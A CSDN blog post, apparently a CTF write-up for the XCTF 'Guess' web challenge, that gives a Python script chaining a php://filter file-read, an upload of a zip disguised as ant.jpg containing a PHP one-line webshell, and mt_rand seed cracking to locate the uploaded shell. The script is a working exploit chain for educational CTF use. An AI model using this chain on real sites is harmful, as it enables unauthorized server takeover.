攻防世界 xctf -Guess writeup

最新推荐文章于 2024-05-30 01:32:57 发布
最新推荐文章于 2024-05-30 01:32:57 发布
阅读量1.2k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haodeshua/article/details/96317161
版权

本题的解析官网上有,这里是一个自动化的脚本,完成的是自动上传一个ant.jpg的文件(ant.jpg是一个ant.zip压缩包重命名的文件,里面是一个ant.php的一句话木马)。运行返回的是在web后台这个文件重命名后的文件的url。可通过zip伪协议访问这个木马。

这个脚本运行需要3个在linux下运行的脚本文件(因为php伪随机数的破解用了一些工具,还有一些php代码)。脚本文件有:猜解随机数种子的php_seed_mt可执行文件,name.php的php文件,pojie2.php猜随机数的文件,这里我就不附上了。有需要这些文件的朋友可以在下方评论留言。

脚本如下:

 

 

import requests
import base64
import re
import os
import subprocess
from urllib3 import encode_multipart_formdata
cookies=""
url="http://111.198.29.45:55294/"
path="./ant.zip"
PHPSESSID="0"

#获取源码
def getcode():
    global url
    urlcode=url+"?page=php://filter/convert.base64-encode/resource=upload"
    r = requests.get(urlcode)
    #print r.text
    #print r.cookies
    return "code:\n"+base64.b64decode(re.search(r'Cgo8.*',r.text).group())

#上传指定的文件
def upload(path):
    global url
    global cookies
    urlupload=url+"?page=upload"
    print os.path.abspath(path)
    filename="ant.jpg"
    data={}
    data["submit"]="Upload Image"
    data["file-upload-field"]=(filename,open(path,'rb').read())
    endata=encode_multipart_formdata(data)
    #print "endata"+endata[0]
    #print "hell"+endata[1]
    header={}
    header["Content-Type"]=endata[1]
    data=endata[0]
    r = requests.post(urlupload,data=data,headers=header)
    if "Upload successfully" in r.text:
        print "successfull upload File"
        print re.search(r"Upload successfully.*\n",r.text).group()
        print r.cookies
        cookies=r.cookies
    else:
        print "fail upload"
        print r.text

#猜解后台文件名
def guess():
    global cookies
    #print cookies
    cookiesText=cookies['PHPSESSID']
    cookiesSession=cookies['SESSI0N']
    #print cookiesText
    #content='''
    #'''
    #file=open("gusss.sh","ab")
    #file.write(content)
    #file.close()
    cmd="cd ~/phpDocument/;php pojie2.php "+cookiesSession+" "+cookiesText
    print cmd
    output=subprocess.check_output(cmd,stderr=subprocess.STDOUT,shell=True)
    print output
    srand=re.search(r'successful.*',output).group()[10:]
    cmd2="cd /opt/php_mt_seed-4.0/;./php_mt_seed "+srand
    print "rand"+srand
    print cmd2
    output2=subprocess.check_output(cmd2,stderr=subprocess.STDOUT,shell=True)
    print "sucessee find seed"
    print re.findall(r'seed =.*',output2)
    for i in re.findall(r'seed=.*',output2):
        cmd3="cd ~/phpDocument/;php name.php "+i.split('=')[2]
        os.system(cmd3)
    return 0
#tips:getcode,create code.txt in current document
content=getcode()
#file=open("code.txt","ab")
#file.write(content)
upload(path)
guess()

 

小傅老师
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1284
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guesswriteup
攻防世界-XSCTF联合招新赛
Welcome To Myon'Blog !
12-08 1976
攻防世界-XSCTF联合招新赛 1、凯撒大帝在培根里藏了什么 2、简单的base编码 3、删库跑路-
攻防世界---你猜猜
最新发布
2201_75556700的博客
05-30 748
5、需要密码,破解密码,密码为:123456(这里题目描述是你猜猜,想着它的密码不会太难,应该是纯数字,试到第六位的时候就出来了)2、将编码转为字符串,看到了PK和flag.txt。1、下载附件,得到文本,里面是十六进制。3、将16进制转为文件(
[攻防世界]guess_num
逆向萌新的博客
06-01 675
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
buuctf GUESS,ZCTF note2学习
weixin_46521144的博客
07-09 239
GUESS 知识点 stack smash\environ泄露栈地址 题解 这道题是一道栈题,好久没见栈题。 可以看到程序会把flag读入内存,之后fork子进程让你猜。这里需要事先了解fork工作方式:把父进程虚拟内存空间完全复制一份(具体来说,私有写时复制)这说明子进程会复制flag,以及栈上所有内容。利用这一点以及题目给我们的三次机会,结合canary smash原理解题。 stack smash之后会输出一串字符串,其地址是environ[0]。基本思路是通过gets()栈溢出,修改environ[
攻防世界 ————你猜猜
woshicainiao666的博客
09-18 323
1.下载附件 ,用记事本打开看到是16进制,因为字母最大的是F和0-9的组合,所以我们猜测是16进制。,得到一个zip,里面有加密的flag.txt,我猜密码是123456,没想到真是123456。5.最后得到flag——————daczcasdqwdcsdzasd。解码,看到里面包含flag.txt。
CTF---Web入门第八题 Guess Next Session
weixin_33890526的博客
11-08 261
Guess Next Session分值:10 来源: iFurySt 难度:易 参与人数:3870人 Get Flag:1672人 答题人数:1690人 解题通过率:99% 写个算法没准就算出来了,23333 hint:你确定你有认真看判断条件? 格式:CTF{} 解题...
XCTF-HW-pipeline附件
11-09
附件
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
攻防世界crypto高手题之你猜猜
沐一 · 林 的博客
09-08 1469
攻防世界crypto高手题之你猜猜 继续开启全栈梦想之逆向之旅~ 这题是攻防世界crypto高手题的你猜猜 下载附件,是一个.txt文件,打开,数字和字母: 504B03040A0001080000626D0A49F4B5091F1E0000001200000008000000666C61672E7478746C9F170D35D0A45826A03E161FB96870EDDFC7C89A11862F9199B4CD78E7504B01023F000A0001080000626D0A49F4B5091F
攻防世界guess_num
zyh18851473527的博客
08-05 3030
首先下载附件 checksec一下再放入IDA中 点击进入sub_C3E函数,发现条件成立即可找到flag 接着进入v7 发现var_30在栈中占0x20,可以覆盖到seed 即利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 ...
Java代码审计手册(English)
重新启程
10-14 1万+
Table of Contents Predictable pseudorandom number generator (PREDICTABLE_RANDOM) Predictable pseudorandom number generator (Scala) (PREDICTABLE_RANDOM_SCALA) Untrusted servlet parameter (SERVLET...
攻防世界-crypto-你猜猜
Lucifer的专栏
09-02 160
利用爆破工具Ziperello得到密码:123456。利用16进制编辑器或python代码恢复原格式。查看字符串跟据起始 判断为zip文件。打开zip可以看到flag.txt。直接获取flag发现是加密的。得到guess.zip。下载附件打开得到密文。获取flag.txt。
CTF之隐写术破解总结
热门推荐
小伟锅的博客
08-26 4万+
一、隐写术可以利用图片、音频、视频为载体将数据隐藏在其中,将数据隐写到图像中较为常见。 二、图像隐写术进行数据隐写分为以下几类: 1.在图片右击-属性-详细信息中隐藏数据信息 2.将数据类型进行改写(rar类型数据 将其改写成jpg格式) 3.根据各种类型图像的固定格式,隐藏数据 修改图像开始标志,改变其原有图像格式; 在图像结束标志后加入数据; 在图
[CTF题目总结-web篇]攻防世界-warmup
T2hunz1
01-10 7610
[CTF题目总结-web篇]攻防世界-warmup
rand()与srand() 攻防世界guess_num write_up
kwist_jay的博客
06-15 471
srand设置产生一系列伪随机数发生器的起始点,要想把发生器重新初始化,可用1作seed值。任何共它的值都把发生器匿成一个随机的起始点。rand检索生成的伪随机数。在任何调用srand之前调用rand与以1作为seed调用srand产生相同的序列。 此函数可以设定rand函数所用的随机数产生演算法的种子值。任何大于一的种子值都会将rand随机数所产生的虚拟随机数序列重新设定一个起始点 ...
guess-xsctf
07-28
- *2* *3* [攻防世界 xctf -Guess writeup](https://blog.csdn.net/haodeshua/article/details/96317161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值